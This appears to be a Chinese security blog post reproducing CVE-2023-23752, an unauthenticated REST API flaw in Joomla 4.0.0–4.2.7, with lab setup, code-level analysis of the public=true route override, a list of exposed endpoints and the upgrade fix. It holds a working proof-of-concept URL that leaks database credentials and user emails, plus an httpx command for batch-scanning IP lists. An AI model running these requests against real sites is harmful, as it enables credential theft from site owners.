[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)

悠悠 2024-04-29 01:56 13阅读 0赞

> ## 🍬 博主介绍 ##
> 
> 👨🎓 博主介绍：大家好，我是 [\_PowerShell][PowerShell] ，很高兴认识大家~  
> ✨主攻领域：【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】  
> 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋  
> 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋  
> 🙏作者水平有限，欢迎各位大佬指点，相互学习进步！

#### 文章目录 ####

*  🍬 博主介绍
 *  一、漏洞编号
 *  二、漏洞简介
 *  三、受影响版本
 *  四、Joomla指纹信息
 *  五、环境搭建
 *   *  1、下载joomla
     *  2、安装joomal
 *  六、漏洞复现
 *   *  1、POC
     *  2、漏洞复现
     *  3、回显出账号密码
 *  七、漏洞分析
 *   *  1、Joomla简介
     *  2、漏洞分析
     *  3、route：路由选择与鉴权
 *  八、受损的API清单
 *  九、漏洞修复

## 一、漏洞编号 ##

CVE-2023-23752

## 二、漏洞简介 ##

> Joomla是一套全球知名的内容管理系统（CMS），其使用PHP语言加上MySQL数据库所开发，可以在Linux、Windows、MacOSX等各种不同的平台上运行。  
> 在 Joomla版本为4.0.0 到 4.2.7中发现了一个漏洞（CVE-2023-23752）、可以对 web 服务端点进行未经授权访问。目前该漏洞的细节及PoC/EXP已公开。该漏洞影响较大，建议客户尽快做好自查及防护。

## 三、受影响版本 ##

Joomla CMS 4.0.0 ~ 4.2.7

## 四、Joomla指纹信息 ##

{
        	"match": "body_contains",
    	"content": "content=\"joomla"},
    {
        	"match": "body_contains",
    	"content": "/media/system/js/core.js"},
    {
        	"match": "body_contains",
    	"content": "/media/system/js/mootools-core.js"}

## 五、环境搭建 ##

### 1、下载joomla ###

1、上官网下载

https://www.joomlachina.cn

2、我复现的环境

https://pan.baidu.com/s/19D5apgrej4ASpTj2vXsZCw?pwd=wmzd

### 2、安装joomal ###

> 直接phpstudy或者wamp搭建，下载解压后放入

wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下。

> 注意：php版本需要7.2.5以上[phpstudy更新php版本][phpstudy_php]  
> 访问http://127.0.0.1/Joomla/就可以安装joomla了

![在这里插入图片描述][a041d7ce4f914796b714c65826160e49.png]  
![在这里插入图片描述][57211583feee47ad8cc2d6131badc638.png]

![在这里插入图片描述][d4f7f099585647668c565beeec7299a1.png]

> 安装完成

![在这里插入图片描述][c09e94a723454d5bb0664f9cf1c2620a.png]

> 进入登陆界面

![在这里插入图片描述][d27f1fc94b724143a798be241f893b5b.png]

## 六、漏洞复现 ##

### 1、POC ###

> 单站点检测：

/api/index.php/v1/config/application?public=true

批量检测：

httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'

### 2、漏洞复现 ###

> 直接将POC拼接到url

http://127.0.0.1/Joomla4.2.7/api/index.php/v1/config/application?public=true
    http://127.0.0.1/Joomla4.2.7/api/index.php/v1/users?public=true

### 3、回显出账号密码 ###

> /v1/config/application这个API用于获取网站最重要的配置信息，包含数据库的账号与密码。

![在这里插入图片描述][8a104de38521422dbfc766b99abd8e14.png]

> /v1/users这个API用于获取网站用户名以及邮箱账号

![在这里插入图片描述][402691ba93c543c980edfe28d8e48dc2.png]

## 七、漏洞分析 ##

> 原文链接：https://xz.aliyun.com/t/12175\#toc-4

### 1、Joomla简介 ###

> Joomla大致有三个路由入口，分别是  
> 1、根目录的index.php(用户访问文章)  
> 2、根目录的administrator/index.php(管理员管理)  
> 3、根目录的api/index.php(开发者爱好的Rest API)  
> 未授权的接口正是第三个入口。因此影响的只有Joomla4.0.0——Joomla4.2.7（Rest API 4.x正式开发）

### 2、漏洞分析 ###

> 这里仅重点分析api/index.php这个路由的问题（index.php和administrator/index.php找不到漏洞）。  
> 网站输入/api/index.php开启debug模式

![在这里插入图片描述][8acfda30a25143ab9b2b759e8e10bc3f.png]

> index.php会来到app.php。其中$app主要的input成员存放所有的HTTP请求参数

![在这里插入图片描述][9c54786708fc4e0d86eecf974f9ce61d.png]

> 在execute()函数中，会经过sanityCheckSystemVariables函数，此函数用来过滤渲染模板的参数，主要防止XSS漏洞。setupLogging和createExtensionNameSpaceMap主要是系统的额外记录工作。doExecute就是具体的路由逻辑函数。

![在这里插入图片描述][df3eea42ae0546faa87f6c0854fc5e8a.png]

> doExecute中最重要的就是route和dispatch函数。

### 3、route：路由选择与鉴权 ###

> 整个route函数分为两部分，路由选择和身份校验。

![在这里插入图片描述][5462309371c645868ea0f630d71c2d05.png]

> 逻辑十分清晰，主要是直接通过parseApiRoute函数从请求的方法和url到$routers中找到对应的路由信息

![在这里插入图片描述][71b8a30b07a34aeb9da0cb2ddd3a6a99.png]

> 身份验证的代码加上debug信息可以知道public参数控制着API是否对外开放。默认情况下是false，不对外开放。但是这里大部分情况都会选择直接下一步。但是回过头看路由获取parseApiRoute时会有新的发现

![在这里插入图片描述][24d354ea8dfe4d80ba7b01a57f9a6dc4.png]

> 这里发送请求  
> http://x.x.x.x/api/index.php/v1/banners?public=true  
> 再来看route变量会发现惊喜

![在这里插入图片描述][fa795544d4964cd0b86fee0fb7a0c201.png]

> 此时route.var中的变量会被请求的变量覆盖。由于public=true，所以接口不需要身份验证，直接到达路由分发，也就是业务逻辑。

## 八、受损的API清单 ##

> 由于能够直接访问API了，从中找到最终的信息即可。

/api/index.php/v1/config/application?public=true

> 此API用于获取网站最重要的配置信息，其中包含数据库的账号与密码。  
> 其他受损API如下

v1/banners
    v1/banners/:id
    v1/banners
    v1/banners/:id
    v1/banners/:id
    v1/banners/clients
    v1/banners/clients/:id
    v1/banners/clients
    v1/banners/clients/:id
    v1/banners/clients/:id
    v1/banners/categories
    v1/banners/categories/:id
    v1/banners/categories
    v1/banners/categories/:id
    v1/banners/categories/:id
    v1/banners/:id/contenthistory
    v1/banners/:id/contenthistory/keep
    v1/banners/:id/contenthistory
    v1/config/application
    v1/config/application
    v1/config/:component_name
    v1/config/:component_name
    v1/contacts/form/:id
    v1/contacts
    v1/contacts/:id
    v1/contacts
    v1/contacts/:id
    v1/contacts/:id
    v1/contacts/categories
    v1/contacts/categories/:id
    v1/contacts/categories
    v1/contacts/categories/:id
    v1/contacts/categories/:id
    v1/fields/contacts/contact
    v1/fields/contacts/contact/:id
    v1/fields/contacts/contact
    v1/fields/contacts/contact/:id
    v1/fields/contacts/contact/:id
    v1/fields/contacts/mail
    v1/fields/contacts/mail/:id
    v1/fields/contacts/mail
    v1/fields/contacts/mail/:id
    v1/fields/contacts/mail/:id
    v1/fields/contacts/categories
    v1/fields/contacts/categories/:id
    v1/fields/contacts/categories
    v1/fields/contacts/categories/:id
    v1/fields/contacts/categories/:id
    v1/fields/groups/contacts/contact
    v1/fields/groups/contacts/contact/:id
    v1/fields/groups/contacts/contact
    v1/fields/groups/contacts/contact/:id
    v1/fields/groups/contacts/contact/:id
    v1/fields/groups/contacts/mail
    v1/fields/groups/contacts/mail/:id
    v1/fields/groups/contacts/mail
    v1/fields/groups/contacts/mail/:id
    v1/fields/groups/contacts/mail/:id
    v1/fields/groups/contacts/categories
    v1/fields/groups/contacts/categories/:id
    v1/fields/groups/contacts/categories
    v1/fields/groups/contacts/categories/:id
    v1/fields/groups/contacts/categories/:id
    v1/contacts/:id/contenthistory
    v1/contacts/:id/contenthistory/keep
    v1/contacts/:id/contenthistory
    v1/content/articles
    v1/content/articles/:id
    v1/content/articles
    v1/content/articles/:id
    v1/content/articles/:id
    v1/content/categories
    v1/content/categories/:id
    v1/content/categories
    v1/content/categories/:id
    v1/content/categories/:id
    v1/fields/content/articles
    v1/fields/content/articles/:id
    v1/fields/content/articles
    v1/fields/content/articles/:id
    v1/fields/content/articles/:id
    v1/fields/content/categories
    v1/fields/content/categories/:id
    v1/fields/content/categories
    v1/fields/content/categories/:id
    v1/fields/content/categories/:id
    v1/fields/groups/content/articles
    v1/fields/groups/content/articles/:id
    v1/fields/groups/content/articles
    v1/fields/groups/content/articles/:id
    v1/fields/groups/content/articles/:id
    v1/fields/groups/content/categories
    v1/fields/groups/content/categories/:id
    v1/fields/groups/content/categories
    v1/fields/groups/content/categories/:id
    v1/fields/groups/content/categories/:id
    v1/content/articles/:id/contenthistory
    v1/content/articles/:id/contenthistory/keep
    v1/content/articles/:id/contenthistory
    v1/extensions
    v1/languages/content
    v1/languages/content/:id
    v1/languages/content
    v1/languages/content/:id
    v1/languages/content/:id
    v1/languages/overrides/search
    v1/languages/overrides/search/cache/refresh
    v1/languages/overrides/site/zh-CN
    v1/languages/overrides/site/zh-CN/:id
    v1/languages/overrides/site/zh-CN
    v1/languages/overrides/site/zh-CN/:id
    v1/languages/overrides/site/zh-CN/:id
    v1/languages/overrides/administrator/zh-CN
    v1/languages/overrides/administrator/zh-CN/:id
    v1/languages/overrides/administrator/zh-CN
    v1/languages/overrides/administrator/zh-CN/:id
    v1/languages/overrides/administrator/zh-CN/:id
    v1/languages/overrides/site/en-GB
    v1/languages/overrides/site/en-GB/:id
    v1/languages/overrides/site/en-GB
    v1/languages/overrides/site/en-GB/:id
    v1/languages/overrides/site/en-GB/:id
    v1/languages/overrides/administrator/en-GB
    v1/languages/overrides/administrator/en-GB/:id
    v1/languages/overrides/administrator/en-GB
    v1/languages/overrides/administrator/en-GB/:id
    v1/languages/overrides/administrator/en-GB/:id
    v1/languages
    v1/languages
    v1/media/adapters
    v1/media/adapters/:id
    v1/media/files
    v1/media/files/:path/
    v1/media/files/:path
    v1/media/files
    v1/media/files/:path
    v1/media/files/:path
    v1/menus/site
    v1/menus/site/:id
    v1/menus/site
    v1/menus/site/:id
    v1/menus/site/:id
    v1/menus/administrator
    v1/menus/administrator/:id
    v1/menus/administrator
    v1/menus/administrator/:id
    v1/menus/administrator/:id
    v1/menus/site/items
    v1/menus/site/items/:id
    v1/menus/site/items
    v1/menus/site/items/:id
    v1/menus/site/items/:id
    v1/menus/administrator/items
    v1/menus/administrator/items/:id
    v1/menus/administrator/items
    v1/menus/administrator/items/:id
    v1/menus/administrator/items/:id
    v1/menus/site/items/types
    v1/menus/administrator/items/types
    v1/messages
    v1/messages/:id
    v1/messages
    v1/messages/:id
    v1/messages/:id
    v1/modules/types/site
    v1/modules/types/administrator
    v1/modules/site
    v1/modules/site/:id
    v1/modules/site
    v1/modules/site/:id
    v1/modules/site/:id
    v1/modules/administrator
    v1/modules/administrator/:id
    v1/modules/administrator
    v1/modules/administrator/:id
    v1/modules/administrator/:id
    v1/newsfeeds/feeds
    v1/newsfeeds/feeds/:id
    v1/newsfeeds/feeds
    v1/newsfeeds/feeds/:id
    v1/newsfeeds/feeds/:id
    v1/newsfeeds/categories
    v1/newsfeeds/categories/:id
    v1/newsfeeds/categories
    v1/newsfeeds/categories/:id
    v1/newsfeeds/categories/:id
    v1/plugins
    v1/plugins/:id
    v1/plugins/:id
    v1/privacy/requests
    v1/privacy/requests/:id
    v1/privacy/requests/export/:id
    v1/privacy/requests
    v1/privacy/consents
    v1/privacy/consents/:id
    v1/privacy/consents/:id
    v1/redirects
    v1/redirects/:id
    v1/redirects
    v1/redirects/:id
    v1/redirects/:id
    v1/tags
    v1/tags/:id
    v1/tags
    v1/tags/:id
    v1/tags/:id
    v1/templates/styles/site
    v1/templates/styles/site/:id
    v1/templates/styles/site
    v1/templates/styles/site/:id
    v1/templates/styles/site/:id
    v1/templates/styles/administrator
    v1/templates/styles/administrator/:id
    v1/templates/styles/administrator
    v1/templates/styles/administrator/:id
    v1/templates/styles/administrator/:id
    v1/users
    v1/users/:id
    v1/users
    v1/users/:id
    v1/users/:id
    v1/fields/users
    v1/fields/users/:id
    v1/fields/users
    v1/fields/users/:id
    v1/fields/users/:id
    v1/fields/groups/users
    v1/fields/groups/users/:id
    v1/fields/groups/users
    v1/fields/groups/users/:id
    v1/fields/groups/users/:id
    v1/users/groups
    v1/users/groups/:id
    v1/users/groups
    v1/users/groups/:id
    v1/users/groups/:id
    v1/users/levels
    v1/users/levels/:id
    v1/users/levels
    v1/users/levels/:id
    v1/users/levels/:id

## 九、漏洞修复 ##

> 升级JoomlaCMS版本到 4.2.8

[PowerShell]: https://blog.csdn.net/qq_51577576
[phpstudy_php]: https://blog.csdn.net/qq_34792528/article/details/89928928
[a041d7ce4f914796b714c65826160e49.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/b2275793b08a4e1387ecd76063371efa.png
[57211583feee47ad8cc2d6131badc638.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/b023025afaa648cfa9c2b7347bf58e39.png
[d4f7f099585647668c565beeec7299a1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/8c150ac658b04443bd9a76284c909984.png
[c09e94a723454d5bb0664f9cf1c2620a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/e2721b986fcd4ff2bc97d8527e247a82.png
[d27f1fc94b724143a798be241f893b5b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/d3872b7ebf9f42afb0f1a905cdff4b5f.png
[8a104de38521422dbfc766b99abd8e14.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/ccdf35f12e294f66a50f8cb78254b5c3.png
[402691ba93c543c980edfe28d8e48dc2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/f8454cecee5d4d7589c2d3043d3de93e.png
[8acfda30a25143ab9b2b759e8e10bc3f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/2cbe7fd6e0f14ba5ad6946ff93411856.png
[9c54786708fc4e0d86eecf974f9ce61d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/cccbb54b0edf43d6a3c6286bb1696104.png
[df3eea42ae0546faa87f6c0854fc5e8a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/87a7b44d30a74fb5bf655db4996c96a1.png
[5462309371c645868ea0f630d71c2d05.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/e13a7f8534814177bdab075bd349a79e.png
[71b8a30b07a34aeb9da0cb2ddd3a6a99.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/0bdefedcefd54a7fbe91ae5fe2eea821.png
[24d354ea8dfe4d80ba7b01a57f9a6dc4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/4d3de511ddaa44f89201238e3657a412.png
[fa795544d4964cd0b86fee0fb7a0c201.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/fa6bdf10cda940d483f06021bf038745.png